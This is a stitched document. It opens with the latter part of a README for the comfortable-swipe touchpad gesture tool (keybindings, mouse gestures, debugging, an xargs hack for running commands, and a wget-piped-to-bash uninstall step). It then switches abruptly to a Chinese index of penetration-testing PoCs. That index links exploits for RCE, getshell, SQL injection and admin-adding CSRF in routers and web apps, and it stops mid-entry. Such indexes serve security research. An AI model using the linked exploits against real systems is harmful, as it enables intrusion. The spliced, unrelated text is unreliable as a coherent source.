GNOME comfortable-swipe up3 = ctrl+alt+Down comfortable-swipe down3 = ctrl+alt+Up ``` ```bash # GNOME alt. comfortable-swipe up3 = super+PgDown comfortable-swipe down3 = super+PgUp ``` ```bash # Pop OS comfortable-swipe up3 = Super+Ctrl+Down comfortable-swipe down3 = Super+Ctrl+Up ``` 1. Move window to workspace (horizontal) ```bash # Ubuntu flavors + GNOME + Kali comfortable-swipe left4 = ctrl+alt+shift+Right comfortable-swipe right4 = ctrl+alt+shift+Left ``` ```bash # Elementary OS comfortable-swipe left4 = super+alt+Right comfortable-swipe right4 = super+alt+Left ``` 1. Move window to workspace (vertical) ```bash # Ubuntu flavors + GNOME + Kali comfortable-swipe up4 = ctrl+alt+shift+Down comfortable-swipe down4 = ctrl+alt+shift+Up ``` ```bash # GNOME alt. comfortable-swipe up4 = super+shift+PgDown comfortable-swipe down4 = super+shift+PgUp ``` 1. Move window to other monitor ```bash # Ubuntu flavors + GNOME comfortable-swipe left4 = super+shift+Right comfortable-swipe right4 = super+shift+Left ``` 1. Toggle workspace overview ```bash # Ubuntu flavors + Elementary OS comfortable-swipe up3 = super+s ``` ```bash # Elementary OS (all workspaces) comfortable-swipe up4 = super+a ``` 1. Show desktop ```bash # Ubuntu flavors comfortable-swipe down3 = ctrl+super+d ``` ```bash # Linux Mint comfortable-swipe down3 = super+d ``` ```bash # Kali comfortable-swipe down3 = ctrl+alt+d ``` ```bash # KDE comfortable-swipe down3 = ctrl+F12 ``` 1. Snap windows to the left/right ```bash comfortable-swipe left3 = super+Left comfortable-swipe right3 = super+Right ``` 1. Toggle maximize ```bash comfortable-swipe up3 = super+Up ``` 1. Toggle minimize ```bash comfortable-swipe down3 = super+Down ``` ## Mouse Gestures (Experimental) You can also play around with mouse gestures during swipe. This enables certain mouse behaviour to trigger along with a 3/4-finger swipe. Keys: - mouse3 - for 3-finger mouse gestures - mouse4 - for 4-finger mosue gestures - hold3 (deprecated) - old equivalent of mouse3 - hold4 (deprecated) - old equivalent of mouse4 Possible Values: - button1 - left click - button2 - middle click - button3 - right click - button4 - wheel up (experimental) - button5 - wheel down (experimental) - move - just move the mouse cursor while fingers are down - scroll - 3/4 finger natural scroll (no acceleration, very experimental) - scroll_reverse - 3/4 finger reverse scroll (no acceleration, very experimental) > **Tip**: You can clear mouse gestures by setting them blank > > ``` > comfortable-swipe mouse3 = > comfortable-swipe mouse4 = > ``` Examples: ✔️ swipes OK ⭕ swipes DISABLED - 3/4-finger drag ⭕ ```bash comfortable-swipe mouse3 = button1 comfortable-swipe mouse4 = button1 ``` You can also use `button2` for middle click and `button3` for right click. - 3/4-finger natural scroll ⭕ ```bash comfortable-swipe mouse3 = scroll comfortable-swipe mouse4 = scroll ``` - 3/4-finger reverse scroll ⭕ ```bash comfortable-swipe mouse3 = scroll_reverse comfortable-swipe mouse4 = scroll_reverse ``` - Move 3/4-fingers with the cursor ✔️ ```bash comfortable-swipe mouse3 = move comfortable-swipe mouse4 = move ``` > **Warning**: Some mouse configuration will **disable up/left/right/down behavior** to avoid gesture conflicts. The logic of this will be improved in the future. ## Debugging You can check your touchpad driver by running ```bash comfortable-swipe debug ``` This is an alias of `libinput debug-events`. This logs all gestures you make on your touchpad, along with other input-based events that can be captured by libinput. A working swipe gesture will show the following: ```bash $ comfortable-swipe debug ... -event9 DEVICE_ADDED TouchPad seat0 default group7 cap:pg size 70x50mm tap(dl off) left scroll-nat scroll-2fg-edge click-buttonareas-clickfinger dwt-on ... event9 GESTURE_SWIPE_BEGIN +2.03s 3 event9 GESTURE_SWIPE_UPDATE +2.03s 3 -9.95/ 2.64 (-26.90/ 7.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.03s 3 -10.44/ 3.19 (-28.22/ 8.62 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.04s 3 -9.71/ 2.64 (-26.25/ 7.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.05s 3 -8.98/ 2.64 (-24.28/ 7.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.06s 3 -7.40/ 2.36 (-20.01/ 6.37 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.06s 3 -6.31/ 2.50 (-17.06/ 6.75 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.07s 3 -5.34/ 1.80 (-14.44/ 4.87 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.08s 3 -4.61/ 2.08 (-12.47/ 5.62 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.09s 3 -4.49/ 1.53 (-12.14/ 4.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.09s 3 -4.01/ 1.25 (-10.83/ 3.37 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.10s 3 -4.13/ 0.42 (-11.15/ 1.12 unaccelerated) event9 GESTURE_SWIPE_END +2.11s 3 ... ``` If you can see `GESTURE_SWIPE_XXX` in your output, that means your touchpad supports multi-touch swipe gestures. ## FAQ: Can I run a _shell command_ instead of a keystroke? **Answer 1**: _Unfortunately **NO**..._ For the following reasons: 1. We want prioritize "comfort" over functionality, which we deliver through performance in our negligible-overhead implementation (that's why C++) 1. There are other gesture libraries that already do this properly (eg. [libinput gestures](https://github.com/bulletmark/libinput-gestures), [Fusuma](https://github.com/iberianpig/fusuma)), we don't want to be a clone of them 1. Running a new shell command with unpredictable process time will break our unthreaded optimizations (unlike native keystrokes) That's why it's not possible... or not? **Answer 2**: _... but actually **IT'S POSSIBLE**!_ Although we don't provide this out of the box in our config, this can definitely be done with the default bash tools. ## Hack: Shell command on swipe Running shell commands our **NOT** part of the core features of comfortable-swipe, but through the default bash tools you can _mimic_ this functionality via our program output. <details> <summary> <b>Use Case</b>: <i>"I want to run <code>gnome-terminal</code> if I swipe up with 3 fingers."</i> </summary> 1. Attach the program to the shell: ```bash comfortable-swipe start --attach ``` Verify it outputs when you swipe left, left, up, right, up with 3 fingers: ```bash $ comfortable-swipe start --attach SWIPE left3 SWIPE left3 SWIPE up3 SWIPE right3 SWIPE up3 ... ``` 1. Filter out the wanted gesture with `grep`. In our case, we want 3-finger swipe up which is "SWIPE up3": ```bash $ comfortable-swipe start --attach | grep --line-buffered "SWIPE up3" SWIPE up3 SWIPE up3 ... ``` > **Note**: The flag `--line-buffered` ensures the output prints line-by-line. 1. Now we can execute our shell command with `xargs`. So if we want "SWIPE up3" to open the terminal, ```bash comfortable-swipe start --attach | grep "SWIPE up3" --line-buffered | xargs -I@ gnome-terminal ``` > **Note**: The flag `-I@` in xargs substitutes the line "SWIPE xxx" to the charatcter "@", which you can use for your program. 1. _Bonus_: Add to autostart Open our autostart file: ```bash gedit "$(comfortable-swipe autostart path)" ``` Tweak the `Exec` section: ```ini [Desktop Entry] Type=Application Exec=comfortable-swipe start Name=Comfortable Swipe Comment=Comfortable 3/4-finger touchpad gestures Hidden=false NoDisplay=false X-GNOME-Autostart-enabled=true ``` To: ```ini [Desktop Entry] Type=Application Exec=comfortable-swipe start --attach | grep "SWIPE up3" --line-buffered | xargs -I@ gnome-terminal Name=Comfortable Swipe Comment=Comfortable 3/4-finger touchpad gestures Hidden=false NoDisplay=false X-GNOME-Autostart-enabled=true ``` 1. Log out and log back in. You should now be able to run your custom shell commands on startup. 1. _Bonus_: Use `--bare` instead of `--attach` to NOT run keystrokes while swiping ```bash comfortable-swipe start --bare | grep "SWIPE up3" --line-buffered | xargs -I@ gnome-terminal ``` 1. _Bonus_: You can pipe multiple gestures with `tee`: ```bash comfortable-swipe start --attach | \ tee >(grep "SWIPE left3" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE left4" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE right3" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE right4" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE up3" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE up4" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE down3" --line-buffered | xargs -I@ <COMMAND>) | \ tee >(grep "SWIPE down4" --line-buffered | xargs -I@ <COMMAND>) ``` Substitute `<COMMAND>` with the shell command of your choice. </details> ## Uninstall Run the following script: ```bash wget -qO - https://raw.githubusercontent.com/Hikari9/comfortable-swipe/master/uninstall | bash ``` ## Bug Reports Search in [Issues](https://github.com/Hikari9/comfortable-swipe/issues?utf8=%E2%9C%93&q=is%3Aissue) if the problem has already been solved. Otherwise, [create a new issue](https://github.com/Hikari9/comfortable-swipe/issues/new) to report your bug. Please include the output of the following: 1. `lsb_release -a` 2. `g++ --version` 3. `ls -l /dev/input/event*` 4. `xinput list | grep touchpad -i` 5. `lsmod | grep hid` 6. `comfortable-swipe status` 7. `comfortable-swipe start` (if you can run it) 8. `comfortable-swipe debug` (try swiping if you can see `GESTURE_SWIPE_XXX`) 9. `cat $(comfortable-swipe config)`
## <span id="head1"> Penetration_Testing_POC</span> 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 - [ Penetration_Testing_POC](#head1) - [ 请善用搜索[`Ctrl+F`]查找](#head2) - [IOT Device&Mobile Phone](#head3) - [Web APP](#head4) - [ 提权辅助相关](#head5) - [ PC](#head6) - [ tools-小工具集合](#head7) - [ 文章/书籍/教程相关](#head8) - [ 说明](#head9) ## <span id="head2"> 请善用搜索[`Ctrl+F`]查找</span> ## <span id="head3">IOT Device&Mobile Phone</span> - [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md) - [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md) - [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md) - [D-Link路由器RCE漏洞](./CVE-2019-16920-D-Link-rce.md) - [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./CVE-2019-13051) - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb) - [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit)](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb) - [从 Interfaces.d 到 RCE:Mozilla WebThings IoT 网关漏洞挖掘](https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/) - [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md) - [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件)](https://www.exploit-db.com/exploits/48158) - [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5权限提升](https://www.exploit-db.com/exploits/48154) - [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md) - [CVE-2020-12753-LG 智能手机任意代码执行漏洞](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) - [CVE-2020-12695-UPnP 安全漏洞](https://github.com/yunuscadirci/CallStranger) - [79款 Netgear 路由器遭远程接管0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py) ## <span id="head4">Web APP</span> - [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md) - [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md) - [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) - [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) - [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) - [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md) - [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md) - [Cobub Razor 0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md) - [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md) - [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) - [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) - [DomainMod的XSS集合](DomainMod的XSS集合.md) - [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) - [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md) - [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md) - [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) - [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) - [Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md) - [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) - [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) - [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) - [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) - [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) - [MetInfoCMS 5.X版本GETSHELL漏洞合集](MetInfoCMS%205.X版本GETSHELL漏洞合集.md) - [discuz ml RCE 漏洞检测工具](discuz-ml-rce/README.md) - [thinkphp5框架缺陷导致远程代码执行](thinkphp5框架缺陷导致远程代码执行.md) - [FineCMS_v5.0.8两处getshell](FineCMS_v5.0.8两处getshell.md) - [Struts2_045漏洞批量检测|搜索引擎采集扫描](Struts2_045-Poc) - [thinkphp5命令执行](thinkphp5命令执行.md) - [typecho反序列化漏洞](typecho反序列化漏洞.md) - [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md) - [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC) - [CVE-2019-15107 Webmin RCE](./CVE-2019-15107) - [thinkphp5 rce漏洞检测工具](./tp5-getshell) - [thinkphp5_RCE合集](./tp5-getshell/TP5_RCE合集.md) - [thinkphp3.X-thinkphp5.x](./tp5-getshell/ThinkPHP.md) - [关于ThinkPHP框架的历史漏洞分析集合](https://github.com/Mochazz/ThinkPHP-Vuln) - [CVE-2019-11510](./CVE-2019-11510) - [Redis(<=5.0.5) RCE](./redis-rogue-server) - [Redis 4.x/5.x RCE(主从复制导致RCE)](https://github.com/Ridter/redis-rce) - [生成Redis恶意模块so文件配合主从复制RCE达到命令执行](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[相关文章](https://www.freebuf.com/vuls/224235.html) - [RedisWriteFile-通过 `Redis` 主从写出无损文件,可用于 `Windows` 平台下写出无损的 `EXE`、`DLL`、 `LNK` 和 `Linux` 下的 `OS` 等二进制文件](https://github.com/r35tart/RedisWriteFile) - [WeblogicScanLot系列,Weblogic漏洞批量检测工具](./WeblogicScanLot) - [jboss_CVE-2017-12149](./jboss_CVE-2017-12149) - [Wordpress的拒绝服务(DoS)-CVE-2018-6389](./CVE-2018-6389) - [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) - [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md) - [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md) - [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md) - [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md) - [泛微OA管理系统RCE漏洞利用脚本](./泛微OA管理系统RCE漏洞利用脚本.md) - [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) - [zentao-getshell 禅道8.2 - 9.2.1前台Getshell](./zentao-getshell) - [泛微 e-cology OA 前台SQL注入漏洞](./泛微%20e-cology%20OA%20前台SQL注入漏洞.md) - [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md) - [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) - [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md) - [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) - [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) - [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043) - [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md) - [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md) - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar) - [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md) - [rConfig v3.9.2 RCE漏洞](./rConfig%20v3.9.2%20RCE漏洞.md) - [apache_solr_rce](./solr_rce.md) - [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md) - [Apache Flink任意Jar包上传导致远程代码执行](https://github.com/LandGrey/flink-unauth-rce) - [用于检测JSON接口令牌安全性测试](https://github.com/ticarpi/jwt_tool) - [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md) - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634) - [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) - [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107) - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) - [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md) - [WDJACMS1.5.2模板注入漏洞](./WDJACMS1.5.2模板注入漏洞.md) - [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781) - [CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781) - [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/) - [CVE-2020-5504-phpMyAdmin注入(需要登录)](https://xz.aliyun.com/t/7092) - [CVE-2020-5509-Car Rental Project 1.0版本中存在远程代码执行漏洞](https://github.com/FULLSHADE/CVE-2020-5509-POC) - [CryptoAPI PoC CVE-2020-0601](https://github.com/kudelskisecurity/chainoffools/blob/master/README.md)|[另一个PoC for CVE-2020-0601](https://github.com/ollypwn/CVE-2020-0601) - [New Weblogic RCE (CVE-2020-2546、CVE-2020-2551) CVE-2020-2546](https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w)|[WebLogic WLS核心组件RCE分析(CVE-2020-2551)](https://www.anquanke.com/post/id/199695)|[CVE-2020-2551-Weblogic IIOP 反序列化EXP](https://github.com/Y4er/CVE-2020-2551) - [CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC](https://github.com/motikan2010/CVE-2020-5398/) - [PHPOK v5.3&v5.4getshell](https://www.anquanke.com/post/id/194453) | [phpok V5.4.137前台getshell分析](https://forum.90sec.com/t/topic/728) | [PHPOK 4.7从注入到getshell](https://xz.aliyun.com/t/1569) - [thinkphp6 session 任意文件创建漏洞复现 含POC](./books/thinkphp6%20session%20任意文件创建漏洞复现%20含POC.pdf) --- 原文在漏洞推送公众号上 - [ThinkPHP 6.x反序列化POP链(一)](./books/ThinkPHP%206.x反序列化POP链(一).pdf)|[原文链接](https://mp.weixin.qq.com/s/rEjt9zb-AksiVwF1GngFww) - [ThinkPHP 6.x反序列化POP链(二)](./books/ThinkPHP%206.x反序列化POP链(二).pdf)|[原文链接](https://mp.weixin.qq.com/s/q8Xa3triuXEB3NoeOgka1g) - [ThinkPHP 6.x反序列化POP链(三)](./books/ThinkPHP%206.x反序列化POP链(三).pdf)|[原文链接](https://mp.weixin.qq.com/s/PFNt3yF0boE5lR2KofghBg) - [WordPress InfiniteWP - Client Authentication Bypass (Metasploit)](https://www.exploit-db.com/exploits/48047) - [【Linux提权/RCE】OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution](https://www.exploit-db.com/exploits/48051) - [CVE-2020-7471-django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter)使用了不安全的数据会造成SQL注入漏洞环境和POC](https://github.com/Saferman/CVE-2020-7471) - [CVE-2019-17564 : Apache Dubbo反序列化漏洞](https://www.anquanke.com/post/id/198747) - [CVE-2019-2725(CNVD-C-2019-48814、WebLogic wls9-async)](https://github.com/lufeirider/CVE-2019-2725) - [YzmCMS 5.4 后台getshell](https://xz.aliyun.com/t/7231) - 关于Ghostcat(幽灵猫CVE-2020-1938漏洞):[CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)|[Java版本POC](https://github.com/0nise/CVE-2020-1938)|[Tomcat-Ajp协议文件读取漏洞](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/)|[又一个python版本CVE-2020-1938漏洞检测](https://github.com/xindongzhuaizhuai/CVE-2020-1938)|[CVE-2020-1938-漏洞复现环境及EXP](https://github.com/laolisafe/CVE-2020-1938) - [CVE-2020-8840:Jackson-databind远程命令执行漏洞(或影响fastjson)](https://github.com/jas502n/CVE-2020-8840) - [CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析(需要认证/或开启访客即可不需要登录)(一款Linux是基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSF利用脚本](https://www.exploit-db.com/exploits/48159) - [CVE-2020-7246-PHP项目管理系统qdPM< 9.1 RCE](https://www.exploit-db.com/exploits/48146) - [CVE-2020-9547:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9547) - [CVE-2020-9548:FasterXML/jackson-databind 远程代码执行漏洞](https://github.com/fairyming/CVE-2020-9548) - [Apache ActiveMQ 5.11.1目录遍历/ Shell上传](https://cxsecurity.com/issue/WLB-2020030033) - [CVE-2020-2555:WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555) - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947) - [CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md) - [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf) - [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce) - [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行]() - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1)](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) - [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/) - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260) - [通达OA前台任意用户伪造登录漏洞批量检测](./通达OA前台任意用户伪造登录漏洞批量检测.md) - [CVE-2020-11890 JoomlaRCE <3.9.17 远程命令执行漏洞(需要有效的账号密码)](https://github.com/HoangKien1020/CVE-2020-11890) - [CVE-2020-10238【JoomlaRCE <= 3.9.15 远程命令执行漏洞(需要有效的账号密码)】&CVE-2020-10239【JoomlaRCE 3.7.0 to 3.9.15 远程命令执行漏洞(需要有效的账号密码)】](https://github.com/HoangKien1020/CVE-2020-10238) - [CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)|[CVE-2020-2883-Weblogic coherence.jar RCE](https://github.com/Y4er/CVE-2020-2883) - [tongda_oa_rce-通达oa 越权登录+文件上传getshell](https://github.com/clm123321/tongda_oa_rce) - [CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP) - [showdoc的api_page存在任意文件上传getshell](./showdoc的api_page存在任意文件上传getshell.md) - [Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法](https://github.com/CaijiOrz/fastjson-1.2.47-RCE) - [SpringBoot_Actuator_RCE](https://github.com/jas502n/SpringBoot_Actuator_RCE) - [jizhicms(极致CMS)v1.7.1代码审计-任意文件上传getshell+sql注入+反射XSS](./books/jizhicms(极致CMS)v1.7.1代码审计引发的思考.pdf) - [CVE-2020-9484:Apache Tomcat Session 反序列化代码执行漏洞](./tools/CVE-2020-9484.tgz)|[CVE-2020-9484:Apache Tomcat 反序列化RCE漏洞的分析和利用](https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/) - [PHPOK 最新版漏洞组合拳 GETSHELL](./books/PHPOK最新版漏洞组合拳GETSHELL.pdf) - [Apache Kylin 3.0.1命令注入漏洞](https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706) - [weblogic T3 collections java InvokerTransformer Transformer InvokerTransformer weblogic.jndi.WLInitialContextFactory](https://github.com/hktalent/weblogic_java_des) - [CVE-2020-5410 Spring Cloud Config目录穿越漏洞](https://xz.aliyun.com/t/7877) - [NewZhan CMS 全版本 SQL注入(0day)](./books/NewZhan%20CMS%20全版本%20SQL注入(0day).pdf) - [盲注 or 联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day)](./books/盲注%20or%20联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day).pdf) - [从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过](./books/从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过.pdf) - [CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞](https://github.com/ctlyz123/CVE-2020-1948) ## <span id="head5"> 提权辅助相关</span> - [windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits) - [windows 